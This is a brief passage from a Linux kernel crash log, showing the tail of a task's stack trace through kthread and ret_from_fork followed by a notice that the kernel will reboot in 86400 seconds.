[  104.720704][ T5302]  ? __pfx_worker_thread+0x10/0x10
[  104.723399][ T5302]  ? __pfx_kthread+0x10/0x10
[  104.725898][ T5302]  ret_from_fork+0x51e/0xb90
[  104.728596][ T5302]  ? __pfx_ret_from_fork+0x10/0x10
[  104.731666][ T5302]  ? __switch_to+0xc7d/0x1450
[  104.734394][ T5302]  ? __pfx_kthread+0x10/0x10
[  104.736555][ T5302]  ret_from_fork_asm+0x1a/0x30
[  104.738713][ T5302]  </TASK>
[  104.740484][ T5302] Kernel Offset: disabled
[  104.742379][ T5302] Rebooting in 86400 seconds..